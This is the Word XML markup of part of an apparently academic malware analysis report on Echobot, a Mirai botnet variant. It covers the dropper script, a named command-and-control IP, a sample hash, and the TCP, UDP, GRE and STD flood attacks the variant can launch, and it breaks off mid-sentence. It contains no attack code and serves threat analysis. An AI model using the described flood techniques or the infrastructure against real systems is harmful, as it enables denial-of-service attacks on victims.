    </w:p>
    <w:p w14:paraId="4A7289C3" w14:textId="375B9208" w:rsidR="00C924B1" w:rsidRDefault="00D50208" w:rsidP="00940CF8">
      <w:r>
        <w:t xml:space="preserve">Network traffic was then saved into a PCAP in which we further analyzed via Wireshark. The following figure below </w:t>
      </w:r>
      <w:r w:rsidR="006A1F2F">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00193506">
        <w:t>isplays the GeoIP</w:t>
      </w:r>
      <w:r w:rsidR="009E3DDE">
        <w:t xml:space="preserve"> location </w:t>
      </w:r>
      <w:r w:rsidR="0035435B">
        <w:t>sources of</w:t>
      </w:r>
      <w:r w:rsidR="009E3DDE">
        <w:t xml:space="preserve"> botnet traffic w</w:t>
      </w:r>
      <w:r w:rsidR="00E02C5E">
        <w:t>e collated and sorted</w:t>
      </w:r>
      <w:r w:rsidR="009E3DDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF1288">
        <w:t>via analyzing</w:t>
      </w:r>
      <w:r w:rsidR="009E3DDE">
        <w:t xml:space="preserve"> our Echobot sample</w:t>
      </w:r>
      <w:r w:rsidR="0095425F">
        <w:t>’s network traffic</w:t>
      </w:r>
      <w:r w:rsidR="009E3DDE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AFC0D0" w14:textId="4EFE0E0E" w:rsidR="00B359B1" w:rsidRDefault="00B359B1" w:rsidP="00B359B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1110"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AA29AF9" wp14:editId="66678E2F">
            <wp:extent cx="5943600" cy="3033395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4027" w14:textId="75EBBF0F" w:rsidR="00D03FD1" w:rsidRPr="00567679" w:rsidRDefault="00B359B1" w:rsidP="00567679">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4680"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure 2.</w:t>
      </w:r>
      <w:r w:rsidR="00785DE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Botnet Traffic</w:t>
      </w:r>
      <w:r w:rsidR="00971E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of infected devices used for DDoS</w:t>
      </w:r>
      <w:r w:rsidR="0078423A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F13929">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>collated via Wireshark</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E378A6" w14:textId="35A4FEF2" w:rsidR="00421C0E" w:rsidRDefault="00421C0E" w:rsidP="003B713B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc101201913"/>
      <w:r w:rsidRPr="00421C0E">
        <w:t>Technical Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0A97C36F" w14:textId="53EF428A" w:rsidR="00BF6A60" w:rsidRDefault="00F13929" w:rsidP="001B57EF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc101201914"/>
      <w:r>
        <w:t>Main Malware Sample</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7E6A6D47" w14:textId="0DD625A8" w:rsidR="001B57EF" w:rsidRPr="001B57EF" w:rsidRDefault="00D20D25" w:rsidP="001B57EF">
      <w:r>
        <w:t>The malware sample we analyzed,</w:t>
      </w:r>
      <w:r w:rsidR="002E77A7">
        <w:t xml:space="preserve"> ECHOBOT.arm6 </w:t>
      </w:r>
      <w:r w:rsidR="006253C5">
        <w:t>was dropped by a bash script named ‘Richard’ from the C2 80.82.67.184</w:t>
      </w:r>
      <w:r w:rsidR="004C5F2E">
        <w:t>. The dropper ‘Richard’ instruct</w:t>
      </w:r>
      <w:r w:rsidR="00220BD7">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="004C5F2E">
        <w:t xml:space="preserve"> systems to download one of the multiple malicious payloads </w:t>
      </w:r>
      <w:r w:rsidR="007C54BE">
        <w:t xml:space="preserve">for different processor architectures including ARM, MIPS, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007C54BE">
        <w:t>SPARC</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007C54BE">
        <w:t xml:space="preserve"> and others.</w:t>
      </w:r>
      <w:r w:rsidR="007912D8">
        <w:t xml:space="preserve"> Echobot.arm6 was one of such payloads used to spread the</w:t>
      </w:r>
      <w:r w:rsidR="00F438D8">
        <w:t xml:space="preserve"> M</w:t>
      </w:r>
      <w:r w:rsidR="007912D8">
        <w:t>irai variant to new IoT devices</w:t>
      </w:r>
      <w:r w:rsidR="009167B3">
        <w:t>, adding more infected devices to the Echobot botnet</w:t>
      </w:r>
      <w:r w:rsidR="005C7BBB">
        <w:t xml:space="preserve"> to deliver DDoS attacks</w:t>
      </w:r>
      <w:r w:rsidR="009167B3">
        <w:t>.</w:t>
      </w:r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680"/>
        <w:gridCol w:w="3437"/>
        <w:gridCol w:w="1482"/>
        <w:gridCol w:w="1309"/>
        <w:gridCol w:w="1537"/>
      </w:tblGrid>
      <w:tr w:rsidR="00421C0E" w14:paraId="67734865" w14:textId="77777777" w:rsidTr="00275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1870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870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BA9A35" w14:textId="41DE3D97" w:rsidR="00421C0E" w:rsidRDefault="00762276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F</w:t>
            </w:r>
            <w:r w:rsidR="00421C0E">
              <w:t xml:space="preserve"> Timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870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1965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1C0E" w14:paraId="65113CC7" w14:textId="77777777" w:rsidTr="00275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AD4892" w14:textId="2FDA78D3" w:rsidR="00421C0E" w:rsidRDefault="00762276" w:rsidP="00421C0E">
            <w:r>
              <w:t>ECHOBOT.arm6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC5E8E0" w14:textId="0F019B35" w:rsidR="00421C0E" w:rsidRDefault="00762276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276">
              <w:t>78b5d0f5d10792b1d816227015a9296b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79839910" w14:textId="02801576" w:rsidR="00421C0E" w:rsidRDefault="0093428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12-03 18:24:07 UTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4893E3C9" w14:textId="4530BE6F" w:rsidR="00421C0E" w:rsidRDefault="008B50AB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6759 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C96824A" w14:textId="7989DC1C" w:rsidR="00421C0E" w:rsidRDefault="00A867D6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f</w:t>
            </w:r>
            <w:r w:rsidR="002E77A7">
              <w:t xml:space="preserve"> 32-Bit Executable, ARM, </w:t>
            </w:r>
            <w:r>
              <w:t>Mirai Botnet Variant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38FBE29A" w14:textId="4AFD826D" w:rsidR="00421C0E" w:rsidRDefault="00421C0E" w:rsidP="00421C0E"/>
    <w:p w14:paraId="6AF1F46E" w14:textId="10572570" w:rsidR="00275A33" w:rsidRDefault="00983078" w:rsidP="00275A33">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc101201915"/>
      <w:r>
        <w:t xml:space="preserve">Mirai </w:t>
      </w:r>
      <w:r w:rsidR="00275A33">
        <w:t>Functionality</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7FE953F1" w14:textId="1C8E0B8D" w:rsidR="00106654" w:rsidRDefault="00022C0C" w:rsidP="00106654">
      <w:r>
        <w:t>Echobot</w:t>
      </w:r>
      <w:r w:rsidR="00895947">
        <w:t xml:space="preserve"> contains</w:t>
      </w:r>
      <w:r w:rsidR="00D25CA2">
        <w:t xml:space="preserve"> many</w:t>
      </w:r>
      <w:r w:rsidR="00895947">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D25CA2">
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="00895947">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C64420">
        <w:t>capabilities</w:t>
      </w:r>
      <w:r w:rsidR="00D25CA2">
        <w:t xml:space="preserve"> used to attack networks and systems</w:t>
      </w:r>
      <w:r w:rsidR="00895947">
        <w:t xml:space="preserve"> which we can analyze and correlate alongside the original </w:t>
      </w:r>
      <w:r w:rsidR="007261CB">
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00895947">
        <w:t xml:space="preserve"> source code.</w:t>
      </w:r>
      <w:r w:rsidR="00DC0A97">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000153C8">
        <w:t>Interestingly enough, this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000153C8">
        <w:t xml:space="preserve"> custom variant does not use HTTP flooding as one of its</w:t>
      </w:r>
      <w:r w:rsidR="0083541F">
        <w:t xml:space="preserve"> many</w:t>
      </w:r>
      <w:r w:rsidR="000153C8">
        <w:t xml:space="preserve"> main attack vectors.</w:t>
      </w:r>
      <w:r w:rsidR="00152B1B">
        <w:t xml:space="preserve"> The following attack vectors this Echobot variant uses is listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5B6F0F" w14:textId="1C62582C" w:rsidR="00D9378B" w:rsidRDefault="00D9378B" w:rsidP="007261CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00200B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TCP Flooding</w:t>
      </w:r>
      <w:r w:rsidR="00022C0C" w:rsidRPr="00200B5E">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D25CA2">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00022C0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D25CA2">
        <w:t xml:space="preserve">This Echobot Mirai variant performs multiple TCP flood attacks including SYN, ACK, XMAS and STOMP. These type of TCP attacks exploit the normal TCP 3-way handshake </w:t>
      </w:r>
      <w:r w:rsidR="00A55EBF">
        <w:t>to consume</w:t>
      </w:r>
      <w:r w:rsidR="0058347D">
        <w:t xml:space="preserve"> more bandwidth and resources</w:t>
      </w:r>
      <w:r w:rsidR="00A64D06">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A1062">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00A64D06">
        <w:t xml:space="preserve"> disrupt</w:t>
      </w:r>
      <w:r w:rsidR="00A55EBF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A1062">
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F7B">
        <w:t xml:space="preserve"> servers and</w:t>
      </w:r>
      <w:r w:rsidR="00A64D06">
        <w:t xml:space="preserve"> services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD54B3" w14:textId="0B2E5ED2" w:rsidR="00C3693D" w:rsidRDefault="004C4464" w:rsidP="00C3693D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CF864E0" wp14:editId="30603CC0">
            <wp:extent cx="5943600" cy="279019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C03F" w14:textId="79225590" w:rsidR="00AC5A66" w:rsidRPr="00C92F0E" w:rsidRDefault="00AC5A66" w:rsidP="00C92F0E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4680"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00200B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comparison of TCP</w:t>
      </w:r>
      <w:r w:rsidR="00CE2C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYN Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00CE2C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00D17A6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Echobot</w:t>
      </w:r>
      <w:r w:rsidR="00CE2C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP-SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE38123" w14:textId="6EA904C7" w:rsidR="001A1DA8" w:rsidRDefault="00C92F0E" w:rsidP="001A1DA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00200B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP </w:t>
      </w:r>
      <w:r w:rsidR="00A342F7" w:rsidRPr="00200B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Flooding</w:t>
      </w:r>
      <w:r w:rsidR="00A342F7" w:rsidRPr="00200B5E">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A342F7">
        <w:t xml:space="preserve">– This Echobot Mirai variant </w:t>
      </w:r>
      <w:r w:rsidR="001A1DA8">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00A342F7">
        <w:t xml:space="preserve"> perform UDP Flooding attacks</w:t>
      </w:r>
      <w:r w:rsidR="003040DC">
        <w:t xml:space="preserve"> including VSE, DNS and UDPPLAIN</w:t>
      </w:r>
      <w:r w:rsidR="00DE5B83">
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidR="00A342F7">
        <w:t xml:space="preserve">he threat actor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A342F7">
        <w:t>is able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A342F7">
        <w:t xml:space="preserve"> send multiple UDP packets</w:t>
      </w:r>
      <w:r w:rsidR="00C34C27">
        <w:t xml:space="preserve"> to overwhelm</w:t>
      </w:r>
      <w:r w:rsidR="00A342F7">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00C34C27">
        <w:t>victim’s</w:t>
      </w:r>
      <w:r w:rsidR="00A342F7">
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r w:rsidR="00C34C27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00854FC4">
        <w:t>and to</w:t>
      </w:r>
      <w:r w:rsidR="00310D53">
        <w:t xml:space="preserve"> lag responses and</w:t>
      </w:r>
      <w:r w:rsidR="00A342F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C34C27">
        <w:t>disrupt services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E922A1" w14:textId="3042D244" w:rsidR="00481662" w:rsidRDefault="00481662" w:rsidP="001A1DA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E8955F8" wp14:editId="0387F85D">
            <wp:extent cx="5943600" cy="293624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371" w14:textId="76A64E8F" w:rsidR="00394F48" w:rsidRDefault="00394F48" w:rsidP="00394F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00200B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Comparison of UDP </w:t>
      </w:r>
      <w:r w:rsidR="000A1896">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mirai Module and Echobot UDP Flood Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C6B87" w14:textId="06E06767" w:rsidR="003C4DFC" w:rsidRDefault="00481662" w:rsidP="00AC7679">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0D68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GRE Ethernet Flooding</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB0D68">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– This Echobot Mirai variant can perform GRE Ethernet flood attacks including GREIP and GREETH. </w:t>
      </w:r>
      <w:r w:rsidR="004E5DB7">
        <w:t>In GRE flooding attacks, the threat actor will encapsulate packets with large amounts of data and route them to a victim’s network to exhaust network resources to de</w:t>
      </w:r>
      <w:r w:rsidR="00334E02">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004E5DB7">
        <w:t>encapsulate</w:t>
      </w:r>
      <w:r w:rsidR="001E0D8A">
        <w:t xml:space="preserve"> the packet</w:t>
      </w:r>
      <w:r w:rsidR="004E5DB7">
        <w:t xml:space="preserve"> payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EEE2AD" w14:textId="0714C814" w:rsidR="00AC7679" w:rsidRDefault="003C4DFC" w:rsidP="00AC7679">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60A94050" wp14:editId="253F43B2">
            <wp:extent cx="5810250" cy="3114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9419"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="58102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C101" w14:textId="33D88C16" w:rsidR="00AC7679" w:rsidRDefault="00AC7679" w:rsidP="00CF4933">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00200B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comparison of GRE Flood Mirai Module and Echobot GRE Flood Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03D305" w14:textId="2EFDDDEA" w:rsidR="00D9378B" w:rsidRDefault="0068396B" w:rsidP="007261CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00200B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>STD Attack</w:t>
      </w:r>
      <w:r w:rsidR="004C147B" w:rsidRPr="00200B5E">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C147B">
        <w:t>– Echobot seems to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> implement a </w:t>
      </w:r>
      <w:r w:rsidR="00171825">
        <w:t>different</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="00C70070">
        <w:t xml:space="preserve"> vector</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where the malware</w:t>
      </w:r>
      <w:r w:rsidR="004C147B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB0294">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="004C147B">
        <w:t xml:space="preserve"> send</w:t>
      </w:r>
      <w:r w:rsidR="000F25E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C147B">
        <w:t>random strings to various IP addresses.</w:t>
      </w:r>
      <w:r w:rsidR="003A5EA6">
        <w:t xml:space="preserve"> This has also been seen in </w:t>
      </w:r>
      <w:r w:rsidR="006744E3">
        <w:t>other</w:t>
      </w:r>
      <w:r w:rsidR="00200B5E">
        <w:t xml:space="preserve"> new</w:t>
      </w:r>
      <w:r w:rsidR="006744E3">
        <w:t xml:space="preserve"> Mirai variant</w:t>
      </w:r>
      <w:r w:rsidR="005B1DBA">
        <w:t>s such as Gafgyt</w:t>
      </w:r>
      <w:r w:rsidR="003A5EA6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CD526" w14:textId="6BABF962" w:rsidR="004C147B" w:rsidRDefault="00200B5E" w:rsidP="004C147B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8B0EA0" wp14:editId="1C057F71">
            <wp:extent cx="5943600" cy="2474595"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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3E1" w14:textId="413919B4" w:rsidR="00F406FC" w:rsidRDefault="00F406FC" w:rsidP="00F406FC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E077E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comparison of STD Mirai Module and Echobot STD Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7FA11E" w14:textId="4BB6851B" w:rsidR="00200B5E" w:rsidRDefault="00765C23" w:rsidP="00200B5E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidR="007400D3">
        <w:t>the c</w:t>
      </w:r>
      <w:r w:rsidR="00D518D5">
        <w:t>ommand line</w:t>
      </w:r>
      <w:r w:rsidR="007400D3">
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00887D34">
        <w:t>strace</w:t>
      </w:r>
      <w:r w:rsidR="008A3249">
        <w:t xml:space="preserve"> and another</w:t>
      </w:r>
      <w:r w:rsidR="0096763B">
        <w:t xml:space="preserve"> python</w:t>
      </w:r>
      <w:r w:rsidR="008A3249">
        <w:t xml:space="preserve"> binary emulation tool</w:t>
      </w:r>
      <w:r w:rsidR="009040EE">
        <w:t xml:space="preserve"> to supplement our results</w:t>
      </w:r>
      <w:r w:rsidR="008A3249">
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009040EE">
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="008A3249">
        <w:t>elos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB0D68">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008E575E">
        <w:t xml:space="preserve"> w</w:t>
      </w:r>
      <w:r w:rsidR="00727EB8">
        <w:t xml:space="preserve">e were able </w:t>
      </w:r>
      <w:r w:rsidR="00BB59EB">
        <w:t>to analyze</w:t>
      </w:r>
      <w:r w:rsidR="008A0C3D">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00BB59EB">
        <w:t xml:space="preserve"> dynamic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB59EB">
        <w:t>behaviour</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB59EB">
        <w:t xml:space="preserve"> of the malware when executed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
